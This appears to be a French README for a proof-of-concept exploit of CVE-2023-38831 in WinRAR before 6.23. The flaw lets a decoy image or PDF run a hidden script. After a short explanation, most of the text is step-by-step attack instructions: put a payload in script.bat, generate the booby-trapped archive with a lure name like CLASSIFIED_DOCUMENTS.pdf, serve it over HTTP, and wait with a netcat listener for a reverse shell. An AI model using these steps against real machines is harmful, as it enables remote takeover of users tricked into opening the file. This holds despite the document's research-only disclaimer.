
⚠️ À des fins éducatives et de recherche en sécurité autorisées uniquement
Très reconnaissant envers l'auteur original du PoC b1tg et Group-IB Threat Intelligence
RARLabs WinRAR antérieur à 6.23 permet aux attaquants d'exécuter du code arbitraire lorsqu'un utilisateur tente d'afficher un fichier bénin dans une archive ZIP.

Le problème survient car une archive ZIP peut inclure un fichier bénin (tel qu'un fichier .JPG ordinaire) ainsi qu'un dossier portant le même nom que le fichier bénin, et le contenu du dossier (qui peut inclure du contenu exécutable) est traité lors d'une tentative d'accès au seul fichier bénin. Cette vulnérabilité a été exploitée dans la nature d'avril à août 2023.

Tout d'abord, modifiez le fichier script.bat avec votre code d'exécution dangereux
Insérez le fichier leurre ; il est recommandé qu'il s'agisse d'une image (.png, jpg) ou d'un document (.pdf)
Exécutez la commande pour générer le fichier exploit
python cve-2023-38831-exp-gen.py CLASSIFIED_DOCUMENTS.pdf script.bat poc.rar
Envoyez le fichier exploit à la machine cible à l'aide de python http.server, par exemple :
python -m http.server
Configurez le listener sur votre machine d'attaque :
nc -nlvp 4444
Téléchargez et ouvrez le fichier exploit avec WinRAR version antérieure à 6.23